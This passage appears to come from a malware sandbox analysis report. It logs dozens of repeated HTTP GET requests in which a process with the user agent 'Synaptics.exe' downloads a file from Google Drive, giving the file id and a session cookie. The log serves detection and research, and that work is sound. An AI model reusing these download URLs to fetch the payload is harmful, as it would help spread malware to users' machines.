                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
